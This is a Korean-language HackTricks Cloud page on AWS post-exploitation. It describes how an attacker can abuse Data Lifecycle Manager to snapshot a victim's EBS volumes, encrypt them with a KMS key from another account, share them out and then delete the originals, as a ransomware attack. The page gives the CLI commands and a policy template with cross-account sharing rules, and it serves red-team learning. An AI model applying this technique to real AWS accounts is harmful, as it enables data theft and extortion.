HackTricks CloudAWS - DLM Post Exploitation
Tip
AWS 해킹 배우기 및 연습하기:
HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
Data Lifecycle Manger (DLM)
EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy
가능한 많은 EBS volumes를 암호화한 다음 현재 EC2 instances, EBS volumes 및 snapshots를 삭제하여 랜섬웨어 공격을 수행할 수 있습니다. 이 악의적 활동을 자동화하기 위해 Amazon DLM을 사용하여 snapshots를 다른 AWS 계정의 KMS key로 암호화하고 암호화된 snapshots를 다른 계정으로 전송할 수 있습니다. 또는 암호화하지 않은 snapshots를 자신이 관리하는 계정으로 전송한 뒤 그곳에서 암호화할 수도 있습니다. 기존 EBS volumes나 snapshots를 직접 암호화하는 것은 간단하지 않지만, 새 volume 또는 snapshot을 생성함으로써 가능하게 할 수 있습니다.
먼저, instance ID, volume ID, encryption status, attachment status, volume type 등 볼륨 정보를 수집하기 위해 다음 명령을 사용합니다.
aws ec2 describe-volumes
그다음, lifecycle policy를 생성합니다. 이 명령은 DLM API를 사용하여 지정된 볼륨의 일일 스냅샷을 자동으로 찍고 지정된 시간에 실행되도록 lifecycle policy를 설정합니다. 또한 snapshots에 특정 태그를 적용하고 볼륨에서 snapshots로 태그를 복사합니다. policyDetails.json 파일에는 대상 태그, 스케줄, 암호화용 선택적 KMS key의 ARN 및 snapshot 공유 대상 계정 등 lifecycle policy의 세부사항이 포함되며, 이는 피해자의 CloudTrail 로그에 기록됩니다.
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
정책 문서의 템플릿은 여기에서 볼 수 있습니다:
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}
Tip
AWS 해킹 배우기 및 연습하기:
GCP 해킹 배우기 및 연습하기:HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.